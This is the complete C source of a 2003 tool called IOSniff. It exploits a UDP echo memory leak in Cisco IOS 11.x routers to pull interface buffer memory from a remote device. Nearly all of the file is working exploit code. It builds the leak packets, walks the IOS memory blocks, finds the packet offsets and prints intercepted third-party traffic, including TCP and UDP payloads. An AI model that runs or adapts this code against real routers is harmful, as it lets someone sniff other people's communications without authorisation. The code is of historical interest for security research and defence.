/*
 * Cisco Systems IOS 11.x UDP echo memory leak remote sniffer
 *
 * $Revision: 1.3 $
 *
 * Description:
 * This tool uses a memory leak bug in the IOS 11.x series. The UDP echo service 
 * (UDP port 7) has to be enabled on the device. The bug will cause the Cisco 
 * router to send about 20kb data from it's interface buffer pools containing 
 * packets in the send/recv/forward queues to us. This tool will identify IOS 
 * memory blocks, find the router specific offset for packets in the block and 
 * decode the packet to the screen. Note that this is not a full dump of the 
 * traffic through the remote router but rather a subset of received data. 
 *
 * Features:
 * - Packet checksum cache to prevent repeated output of the same packet
 * - Auto identification of packets and buffer offsets
 * - IPv4 decoding
 * 
 * ---
 * ChangeLog:
 * 
 * $Log: iosniff.c,v $
 * Revision 1.3  2003/06/21 16:10:36  root
 * Cleanup.
 *
 * Revision 1.2  2003/06/21 16:05:43  root
 * ICMP and ARP support added. Coded the automagic packet offset find function.
 *
 * Revision 1.1  2003/06/20 19:47:46  root
 * Initial revision
 *
 * ---
 *
 * (c) 2003 
 * by FX of Phenoelit <fx@phenoelit.de>
 * Phenoelit (http://www.phenoelit.de)
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#include <netinet/in.h>
#include <rpc/types.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>

#include "protocols.h"
#include "packets.h"

// the blabla
#define BLA	"--==[ Phenoelit IOSniff ]==--\n"\
		"Cisco IOS 11.x UDP echo memory leak remote sniffer\n"

// ***************** Status and other tracking *******************

//
// Pointer cache
//
typedef struct {
    unsigned int	nexta;
    unsigned short	check;
    void		*next;
} ptrcache_t;

ptrcache_t		*pcache;


// 
// UDP leak 
//
#define		LOCALPORT	31336		// almost 31337 ;)
struct {
    int			sfd;
    int			udpsfd;
    int			brk;
    int			packet_offset;
} leak;

//
// config
//
#define		DEFAULTCACHE	100000;
struct {
    char		*device;
    char		*target;
    struct in_addr	target_addr;
    int			verbose;
    int			hex;
    int			dontfind;
    unsigned int	leakme;
    unsigned int	timeout;
    unsigned int	maxcachesize;
} cfg;


#define		MODE_TCPDUMP	0
#define		MODE_FIND	1
//
// function prototypes
//
void	usage(char *s);
void	*smalloc(size_t s);
int	IOSlack(int mode);
unsigned char *UDPecho( unsigned int *plen, 
	unsigned char *payload, unsigned int payload_len);
void	UDPanalyze(unsigned char *b, unsigned int len, int mode);
void	schaffner(int s);
void	tcpdump(unsigned char *p, unsigned int length,unsigned int nexta);
unsigned int	find_offset(unsigned char *p, unsigned int length);

int	pcache_add(unsigned int nexta, unsigned short check);
int	pcache_known(unsigned int nexta, unsigned short check);
void	pcache_clear(void);
unsigned int	pcache_count(void);

void	textdump(unsigned char *t, unsigned int l);
// *************************** main code *************************


int main(int argc, char **argv) {
    // 
    // command line
    //
    char	option;
    extern char *optarg;

    // 
    // init
    //
    memset(&cfg,0,sizeof(cfg));
    memset(&leak,0,sizeof(leak));
    pcache=NULL;
    // bla
    printf(BLA);
    // 
    // set defaults
    //
    cfg.leakme=0x4C00;
    cfg.timeout=3;
    cfg.maxcachesize=DEFAULTCACHE;
    leak.packet_offset=78;

    while ((option=getopt(argc,argv,"voxFl:c:t:L:d:i:"))!=EOF) {
	switch(option) {
	    case 'v':	cfg.verbose++;
			break;
	    case 'o':	leak.brk=1;
			break;
	    case 'x':	cfg.hex++;
			break;
	    case 'F':	cfg.dontfind++;
			break;
	    case 't':	cfg.timeout=(int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'L':	cfg.leakme=(int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'c':	cfg.maxcachesize=(int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'l':	leak.packet_offset=(int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'd':	{
			    struct hostent	*he;
			    if ((he=gethostbyname(optarg))==NULL) { 
				fprintf(stderr,"Count not resolve %s\n",cfg.target);
				return (-1);
			    }
			    bcopy(he->h_addr,
				    (char *)&(cfg.target_addr.s_addr),
				    he->h_length);
			    cfg.target=smalloc(strlen(optarg)+1);
			    strcpy(cfg.target,optarg);
			}
			break;
	    case 'i':	cfg.device=smalloc(strlen(optarg)+1);
			strcpy(cfg.device,optarg);
			break;
	    default:	usage(argv[0]);
			// does not return
	}
    }

    // 
    // idiot check
    //
    if ( !(cfg.device && *((u_int32_t *)&(cfg.target_addr)) )) 
	usage(argv[0]);

    // 
    // check if it WOULD work
    //
    if (IOSlack(MODE_FIND)!=0) {
	fprintf(stderr,"Your target does not seem to leak data.\n");
	return (1);
    }
    
    // 
    // set signal handler
    //
    signal(SIGINT,schaffner);


    while (!leak.brk) {
	IOSlack(MODE_TCPDUMP);
	usleep(10000);

	if ( (pcache_count()*sizeof(ptrcache_t)) > cfg.maxcachesize) {
	    printf("MAX Cache size of %u bytes reached\n",
		    pcache_count()*sizeof(ptrcache_t));
	    pcache_clear();
	}
    }

    // 
    // all done
    //
    pcache_clear();
    close(leak.sfd);
    close(leak.udpsfd);
    return 0;
}


void usage(char *s) {
    fprintf(stderr,"Usage: %s -i <interface> -d <target> [-options]\n",s);
    fprintf(stderr,"Options are:\n"
	    "-v   Verbose mode.\n"
	    "-x   Hex dumps preferred\n"
	    "-F   Do not try to find packet offset\n"
	    "-o   Only one packet Wasili, only one packet\n"
	    "-tn  Set timeout for info leak to n seconds\n"
	    "-Ln  Set requested memory leak to n bytes\n"
	    "-ln  Set packet offset in memory leak (default: 78)\n"
	    );
    exit (1);
}


// 
// *********************** UDP related **************************
//

int IOSlack(int mode) {
    // 
    // the leak packet
    //
    unsigned char	*packet;
    unsigned int	length;
    char		dummy[]="0stern";
    // 
    // recv stuff
    //
    char		*rbuf;
    unsigned int	rx;
    // 
    // doing the stuff
    //
    struct sockaddr_in	frm;
    int			frmlen=sizeof(struct sockaddr_in);
    fd_set		rfds;
    struct timeval	tv;
    int			select_ret;
    int			recvflag;
    struct sockaddr_in	myself;


    //
    // init
    //
    recvflag=0;

    // 
    // get the sockets
    //
    if (leak.sfd==0) {
	if ( (leak.sfd=init_socket_IP4(cfg.device,1)) == (-1) ) {
	    fprintf(stderr,"Couldn't grab a raw socket\n");
	    return (-1);
	}
    }

    if (leak.udpsfd==0) {
	    myself.sin_family=AF_INET;
	    myself.sin_port=htons(LOCALPORT);
	    myself.sin_addr.s_addr=INADDR_ANY;
	    if ( (leak.udpsfd=socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP)) <0) {
		fprintf(stderr,"Couldn't grab a UDP socket\n");
		return (-1);
	    }
	    if ( bind(leak.udpsfd,(struct sockaddr *)&myself,
			sizeof(struct sockaddr)) != 0) {
		fprintf(stderr,"bind() failed\n");
		return (-1);
	    }
    }

    // 
    // make a packet
    //
    packet=UDPecho(&length,dummy,sizeof(dummy)-1);

    //
    // allocate receive buffer
    //
    rbuf=smalloc(cfg.leakme+0x200);

    // 
    // do it
    //
    sendpack_IP4(leak.sfd,packet,length);

    tv.tv_sec=cfg.timeout;
    tv.tv_usec=0;
    FD_ZERO(&rfds);
    FD_SET(leak.udpsfd,&rfds);
    select_ret=select(leak.udpsfd+1,&rfds,NULL,NULL,&tv);

    if (select_ret>0) {
	rx=recvfrom(leak.udpsfd,rbuf,cfg.leakme,0,(struct sockaddr *)&frm,&frmlen);
	if (rx<0) {
	    fprintf(stderr,"UDP recvfrom() failed\n");
	    return (-1);
	}
	if (cfg.verbose) printf("Received %u bytes data\n",rx);
	if (cfg.verbose>2) hexdump(rbuf,rx);
	recvflag=1;
	// 
	// analyze what we got
	//
	UDPanalyze(rbuf,rx,mode);
    } else {
	if (!leak.brk) printf("Timeout - may be lost packet?\n");
    }

    //
    // clean up
    //
    free(packet);
    free(rbuf);

    if (recvflag) { return 0; } else { return 1; }
}


unsigned char *UDPecho(
	unsigned int *plen, 		// returned length of packet
	unsigned char *payload, 	// pointer to payload
	unsigned int payload_len	// length of payload
	) {
    unsigned char	*pack;
    iphdr_t		*ip;
    udphdr_t		*udp;
    u_char		*pay;
    u_char		*t;
    u_int16_t		cs;

    *plen=sizeof(iphdr_t)+sizeof(udphdr_t)+payload_len;
    pack=smalloc(*plen+10);
    
    ip=(iphdr_t *)pack;
    ip->version=4;
    ip->ihl=sizeof(iphdr_t)/4;
    ip->ttl=0x80;
    ip->protocol=IPPROTO_UDP;
    memcpy(&(ip->saddr.s_addr),&(packet_ifconfig.ip.s_addr),IP_ADDR_LEN);
    memcpy(&(ip->daddr.s_addr),&(cfg.target_addr),IP_ADDR_LEN);

    udp=(udphdr_t *)((void *)ip+sizeof(iphdr_t));
    udp->sport=htons(LOCALPORT);
    udp->dport=htons(7);
    udp->length=htons(cfg.leakme);

    pay=(u_char *)((void *)udp+sizeof(udphdr_t));
    t=pay;
    memcpy(pay,payload,payload_len);
    t+=payload_len;
    
    ip->tot_len=htons(*plen);
    cs=chksum((u_char *)ip,sizeof(iphdr_t));
    ip->check=cs;

    if (cfg.verbose>1) hexdump(pack,*plen);
    return pack;
}


void UDPanalyze(unsigned char *b, unsigned int len, int mode) {
#define ST_MAGIC	1
#define ST_PID		2
#define ST_CHECK	3
#define ST_NAME		4
#define ST_PC		5
#define ST_NEXT		6
#define ST_PREV		7
#define ST_SIZE		8
#define ST_REF		9
#define ST_LASTDE	10
#define ST_ID_ME_NOW	100
    unsigned char	*p;
    int			state=0;
    unsigned int	foff,foffsave;

    unsigned char	*data_start;
    unsigned char	*data_end;

    unsigned int	p_name;
    unsigned int	p_pc;
    unsigned int	p_next;
    unsigned int	p_prev;


    foff=foffsave=0;
    data_start=NULL;
    p=b;
    while ((b+len-4)>p) {

	if ( (p[0]==0xfd) && (p[1]==0x01) && (p[2]==0x10) && (p[3]==0xDF) ) {
	    if (cfg.verbose>1) printf("REDZONE MATCH!\n");
	    state=ST_MAGIC;
	    data_end=p;
	    p+=4;

	    if (data_start!=NULL) {
		if (mode!=MODE_FIND) {
		    tcpdump(data_start,(unsigned int)(data_end-data_start),p_next);
		} else {
		    if ((foff = find_offset(data_start,
				    (unsigned int)(data_end-data_start)))!=0) {
			if (foffsave==0) { foffsave=foff; } 
			else {
			    if (foff!=foffsave) {
				printf("Packet offset identification unclear!"
					" Use -F and -l<n> manually\n");
				exit(-2);
			    } else {
				printf("Packet offset identified as %u\n",foff);
				leak.packet_offset=foff;
			    }
			}
		    }
		}
		data_start=NULL;
		data_end=NULL;
	    }
	}

	switch (state) {
	    case ST_MAGIC:
		if (cfg.verbose>1)
		    printf("MEMORY BLOCK\n");
		state++;
		p+=4;
		break;
		
	    case ST_PID:
		if (cfg.verbose>1)
		    printf("\tPID        : %08X\n",ntohl(*(unsigned int *)p));
		state++;
		p+=4;
		break;

	    case ST_CHECK:
		if (cfg.verbose>1)
		    printf("\tAlloc Check: %08X\n",ntohl(*(unsigned int *)p));
		state++; 
		p+=4;
		break;

	    case ST_NAME:
		p_name=ntohl(*(unsigned int *)p);
		if (cfg.verbose>1)
		    printf("\tAlloc Name : %08X\n",p_name);
		state++;
		p+=4;
		break;

	    case ST_PC:
		p_pc=ntohl(*(unsigned int *)p);
		if (cfg.verbose>1)
		    printf("\tAlloc PC   : %08X\n",p_pc);
		state++;
		p+=4;
		break;

	    case ST_NEXT:
		p_next=ntohl(*(unsigned int *)p);
		if (cfg.verbose>1) 
		    printf("\tNEXT Block : %08X\n",p_next);
		state++;
		p+=4;
		break;

	    case ST_PREV:
		p_prev=ntohl(*(unsigned int *)p);
		if (cfg.verbose>1)
		    printf("\tPREV Block : %08X\n",p_prev);
		state++;
		p+=4;
		break;

	    case ST_SIZE:
		if (cfg.verbose>1)
		    printf("\tBlock Size : %8u words",
			ntohl(*(unsigned int *)p)&0x7FFFFFFF);
		if (ntohl(*(unsigned int *)p)&0x80000000) {
		    if (cfg.verbose>1)
			printf(" (Block in use)\n");
		} else {
		    if (cfg.verbose>1)
			printf(" (Block NOT in use)\n");
		}
		state++;
		p+=4;
		break;

	    case ST_REF:
		if (cfg.verbose>1)
		    printf("\tReferences : %8u\n",ntohl(*(unsigned int *)p));
		state++;
		p+=4;
		break;

	    case ST_LASTDE:
		if (cfg.verbose>1)
		    printf("\tLast DeAlc : %08X\n",ntohl(*(unsigned int *)p));
		state=ST_ID_ME_NOW;
		p+=4;
		break;

	    //
	    // Identification of the contents
	    //
	    case ST_ID_ME_NOW:
		data_start=p;
		state=0;
		p+=4;
		break;

	    default:
		p+=1;

	}
    } // end of while()

    
}


void	schaffner(int s) {
    leak.brk++;
}


void	tcpdump(unsigned char *p, unsigned int length,unsigned int nexta) {
#define CACHE_LENGTH	(14+20+8)
    unsigned short	cs;
    unsigned char	*pack;
    unsigned char	*px;
    etherIIhdr_t	*eth;
    iphdr_t		*ip;

    //
    // too short
    //
    if (length< (leak.packet_offset + CACHE_LENGTH) ) {
	if (cfg.verbose) printf("Too short (%u bytes)\n",length);
	return;
    }
    pack=(unsigned char *)((void *)p+leak.packet_offset);

    //
    // assume it's some kind of ehternet, otherwise we are toast anyway
    //
    eth=(etherIIhdr_t *)pack;
    if ( !memcmp(&(eth->saddr),&(packet_ifconfig.eth),6) ) {
	if (cfg.verbose) printf("That's me, forget it\n");
	return;
    }
    if ( (pack[6]+pack[7]+pack[8]+pack[9]+pack[10]+pack[11])==0 ) {
	return;
    }

    // 
    // cache list
    //
    cs=chksum(pack,CACHE_LENGTH);
    if (pcache_add(nexta,cs)) return;


    if (cfg.verbose) printf("Packet, %u bytes of potatial data:\n",length);
    if (cfg.verbose>1) hexdump(p,length);


    printf("[0x%08X]: ",nexta);
    printf("%02X:%02X:%02X:%02X:%02X:%02X -> %02X:%02X:%02X:%02X:%02X:%02X\n",
	    pack[6],pack[7],pack[8],pack[9],pack[10],pack[11],
	    pack[0],pack[1],pack[2],pack[3],pack[4],pack[5]);
    if (ntohs(eth->type) == 0x0800 ) {
	//
	// yippi, it's IP 
	//
	px=(unsigned char *)ip=(iphdr_t *)((void*)pack + sizeof(etherIIhdr_t));
	if (ip->version==4) {
	    int		frag_flag;
	    int		iplen;
	    //
	    // cool, we know how that looks like
	    //
	    frag_flag=0;
	    //
	    // calculate the length of the IP packet and compare it to what
	    // we actually have here
	    //
	    iplen=ntohs(ip->tot_len)-(ip->ihl * 4);
	    px+=(ip->ihl *4);
	    if (iplen>(length-leak.packet_offset-sizeof(etherIIhdr_t))) {
		if (cfg.verbose) printf(" short IP packet\n");
		return;
	    }

	    //
	    // print IPv4 infos
	    //
	    printf(" %s ->",inet_ntoa(ip->saddr));
	    printf(" %s ",inet_ntoa(ip->daddr));
	    printf("%4u bytes [TTL %u] ",ntohs(ip->tot_len),ip->ttl);
	    if ( (ntohs(ip->off)&0x4000) ) {
		printf("DF ");
	    } else if ( (ntohs(ip->off)&0x2000) ) {
		printf("Frag ");
		frag_flag=1;
	    }
	    printf("(payload %u)\n",iplen);

	    //
	    // We don't handle fragmented packets 
	    //
	    if (frag_flag) {
		if (ip->protocol == IPPROTO_ICMP) 
		    printf(" Fragmented ICMP\n");
		else if (ip->protocol == IPPROTO_TCP) 
		    printf(" Fragmented TCP\n");
		else if (ip->protocol == IPPROTO_UDP) 
		    printf(" Fragmented UDP\n");
		else 
		    printf(" Fragmented IPPROTO %02X\n",ip->protocol);
		// 
		// break out here
		//
		return;
	    } 

	    // 
	    // so it's unfragmented IP, eh? 
	    //
	    if (ip->protocol == IPPROTO_TCP) {
		//
		// TCP !
		//
		int		tcplen;
		int		tcphl;
		tcphdr_t	*tcp;

		tcp=(tcphdr_t *)px;
		// 
		// catch short TCP
		//
		tcphl=((px[12] & 0xF0)>>4)*4;
		if ((iplen-sizeof(tcphdr_t))<0) {
		    printf(" short TCP\n");
		    return;
		}
		if ((tcplen=iplen-tcphl) < 0) {
		    printf(" short TCP by header\n");
		    return;
		}
		px+=tcphl;

		//
		// print TCP info
		//
		printf(" [TCP] %5u -> %5u (%u/%u) ",
			ntohs(tcp->th_sport),ntohs(tcp->th_dport),
			(unsigned int)ntohl(tcp->th_seq),
			(unsigned int)ntohl(tcp->th_ack));
		if (tcp->th_flags & 0x20) printf("URG ");
		if (tcp->th_flags & 0x10) printf("ACK ");
		if (tcp->th_flags & 0x08) printf("PSH ");
		if (tcp->th_flags & 0x04) printf("RST ");
		if (tcp->th_flags & 0x02) printf("SYN ");
		if (tcp->th_flags & 0x01) printf("FIN ");
		printf(" win %u (payload %u)\n",htons(tcp->th_win),tcplen);

		if (tcplen>0) {
		    if (cfg.hex) hexdump(px,tcplen);
		    else textdump(px,tcplen);
		}

	    } else if (ip->protocol == IPPROTO_UDP) {
		//
		// UDP 
		//
		udphdr_t	*udp;
		int		udpl;

		udp=(udphdr_t *)px;
		if ((udpl=iplen-sizeof(udphdr_t))<0) {
		    // 
		    // catch short UDP
		    //
		    printf(" short UDP\n");
		    return;
		}
		px+=sizeof(udphdr_t);

		// 
		// catch stuff from this game
		//
		if ((ntohs(udp->sport)==7)||(ntohs(udp->dport)==7)) {
		    if (cfg.verbose) printf(" UDP echo ... \n");
		    return;
		}
		
		//
		// Print UDP info
		//
		printf(" [UDP] %5u -> %5u (payload %u)\n",
			ntohs(udp->sport),ntohs(udp->dport),udpl);
		if (udpl>0) {
		    if (cfg.hex) hexdump(px,udpl);
		    else textdump(px,udpl);
		}
	    } else if (ip->protocol == IPPROTO_ICMP) {
		// 
		// ICMP HERE
		//
		icmphdr_t	*icmp;

		icmp=(icmphdr_t *)px;
		if (iplen<sizeof(icmphdr_t)) {
		    printf(" short ICMP\n");
		    return;
		} 
		//
		// print ICMP info
		//
		switch (icmp->type) {
		    case ICMP_ECHOREPLY:	
			printf(" ICMP Echo Reply\n"); break;
		    case ICMP_DEST_UNREACH:	
			printf(" ICMP Destination unreachable\n"); break;
		    case ICMP_SOURCE_QUENCH:
			printf(" ICMP source quench\n"); break;
		    case ICMP_REDIRECT:
			printf(" ICMP redirect\n"); break;
		    case ICMP_ECHO:
			printf(" ICMP Echo Request (ping)\n"); break;
		    case ICMP_ROUTER_ADVERT:
			printf(" ICMP router advertisement\n"); break;
		    case ICMP_SOLICITATION:
			printf(" ICMP router solicitation\n"); break;
		    case ICMP_TIME_EXCEEDED:
			printf(" ICMP time exceeded in transit\n"); break;
		    case ICMP_PARAMETERPROB:
			printf(" ICMP parameter problem\n"); break;
		    case ICMP_TIMESTAMP:
			printf(" ICMP timestamp request\n"); break;
		    case ICMP_TIMESTAMPREPLY:
			printf(" ICMP timestamp reply\n"); break;
		    case ICMP_INFO_REQUEST:
			printf(" ICMP information request\n"); break;
		    case ICMP_INFO_REPLY:
			printf(" ICMP information reply\n"); break;
		    case ICMP_ADDRESS:
			printf(" ICMP netmask request\n"); break;
		    case ICMP_ADDRESSREPLY:
			printf(" ICMP netmask reply\n"); break;
		    default:
			printf(" Some ICMP type (%u)\n",icmp->type);
		}
	    } else {
		//
		// misc IP
		//
		printf(" some IP stuff:\n");
		if (iplen>0) {
		    if (cfg.hex) hexdump(px,iplen);
		    else textdump(px,iplen);
		}
	    }

	} else if (ip->version==6) {
	    //
	    // IPv6
	    //
	    printf("IPv6 not supported by this lame sniffer\n");
	} else {
	    //
	    // bullshit
	    //
	    printf("Broken IP\n");
	}
	
	
    } else if (ntohs(eth->type) == 0x0806) {
	//
	// *arp* *arp* *arp*
	//
	arphdr_t	*arp;

	if ((length-leak.packet_offset)<(sizeof(etherIIhdr_t)+sizeof(arphdr_t))) {
	    printf(" short ARP\n");
	    return;
	} 
	arp=((void*)eth+sizeof(etherIIhdr_t));
	//
	// print ARP info
	//
	if (ntohs(arp->opcode)==ARPOP_REQUEST) {
	    printf(" [ARP] Request for %u.%u.%u.%u from %u.%u.%u.%u\n",
		    arp->tip[0],arp->tip[1],arp->tip[2],arp->tip[3],
		    arp->sip[0],arp->sip[1],arp->sip[2],arp->sip[3]);
	} else if (ntohs(arp->opcode)==ARPOP_REPLY) {
	    printf(" [ARP] Reply for %u.%u.%u.%u from %u.%u.%u.%u"
		    " (MAC: %02X:%02X:%02X:%02X:%02X:%02X)\n",
		    arp->tip[0],arp->tip[1],arp->tip[2],arp->tip[3],
		    arp->sip[0],arp->sip[1],arp->sip[2],arp->sip[3],
		    arp->tha[0],arp->tha[1],arp->tha[2],
		    arp->tha[3],arp->tha[4],arp->tha[5]);
	} else {
	    printf(" [ARP] opcode %u\n",ntohs(arp->opcode));
	}
    } else {
	int	r;
	//
	// stuff
	//
	printf(" pure Ethernet stuff\n");
	r=length-leak.packet_offset-16;
	px=&pack[16];
	if (r>0) {
	    if (cfg.hex) hexdump(px,r);
	    else textdump(px,r);
	}
    }


    return;
}


int	pcache_add(unsigned int nexta, unsigned short check) {
    ptrcache_t	*p,*px;

    p=pcache;
    if (p == NULL) {
	p=smalloc(sizeof(ptrcache_t));
	p->nexta=nexta;
	p->check=check;
	p->next=NULL;
	pcache=p;

    } else {
	while (p != NULL) {

	    if ( (p->nexta == nexta) && (p->check == check) ) {
		if (cfg.verbose) printf("Cache hit\n");
		return 1;
	    }
	    
	    px=p;
	    p=p->next;
	}

	p=smalloc(sizeof(ptrcache_t));
	p->nexta=nexta;
	p->check=check;
	p->next=NULL;
	px->next=p;

    }

    if (cfg.verbose) 
	printf("Added packet buffer with next = 0x%08X and cs = 0x%04X\n",
		nexta,check);

    return 0;
}


int	pcache_known(unsigned int nexta, unsigned short check) {
    ptrcache_t	*p;

    p=pcache;
    while (p!=NULL) {
	if ( (p->nexta==nexta) && (p->check == check) ) {
	    return 1;
	}
	p=p->next;
    }
    return 0;
}


void	pcache_clear(void) {
    ptrcache_t	*p,*px;

    p=pcache;
    while (p!=NULL) {
	px=p->next;
	free(p);
	p=px;
    }
    pcache=NULL;
}


unsigned int	pcache_count(void) {
    ptrcache_t		*p;
    unsigned int	i;

    p=pcache;
    i=0;
    while (p!=NULL) {
	i++;
	p=p->next;
    }
    return i;
}


void	textdump(unsigned char *t, unsigned int l) {
    unsigned int	i,j;

    j=0;
    putchar(' ');
    for (i=0;i<l;i++) {
	if ((t[i]>=0x20)&&(t[i]<=0x7F)) putchar(t[i]); else putchar('.');
	j++;
	if (j==60) {
	    printf("\n ");
	    j=0;
	}
    }
    if (j!=0) printf("\n");
}


unsigned int	find_offset(unsigned char *p, unsigned int length) {
#define	PAT_SPACE	10
    unsigned char	*px;
    unsigned char	*ipo;
    unsigned int	o;
    unsigned char	pat_cdp[] = "\x01\x00\x0c\xcc\xcc\xcc";
    unsigned char	pat_cdp2[] = "\xaa\xaa\x03\x00\x00\x0c";
    unsigned char	pat_ip[] = "\x08\x00\x45\x00";
    unsigned char	pat_arpreq[] = "\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01";
    unsigned char	pat_arprsp[] = "\x08\x06\x00\x01\x08\x00\x06\x04\x00\x02";
    unsigned char	pat_bcast[] = "\xFF\xFF\xFF\xFF\xFF\xFF";

    o=0;
    px=p;
    while (o<(length-PAT_SPACE)) {
	ipo=px+12;
	//
	// look for ARP
	//
	if ( (!memcmp(px,pat_bcast,6)) && (!memcmp(((void*)px+12),pat_arpreq,10)) ) {
	    if (cfg.verbose) printf("[FIND] ARP request found\n");
	    return o;
	}
	if ( (!memcmp(px,pat_arprsp,10)) ) {
	    if (cfg.verbose) printf("[FIND] ARP reply found\n");
	    if (o>12) 
		return o-12;
	    else
		if (cfg.verbose) printf("[FIND] low offset ignored\n");
	}

	// 
	// look for IP broadcast packets 
	//
	if ( (!memcmp(px,pat_bcast,6)) && (!memcmp(ipo,pat_ip,4)) ) {
	    if (cfg.verbose) printf("[FIND] IP Broadcast packet found\n");
	    return o;
	}
	// 
	// now look for CDP packets
	//
	if ( (!memcmp(px,pat_cdp,6)) && (!memcmp(((void*)px+14),pat_cdp2,6)) ) {
	    if (cfg.verbose) printf("[FIND] CDP packet found\n");
	    return o;
	}

	//
	// advance
	//
	o++;
	px++;
    }

    return 0;
}
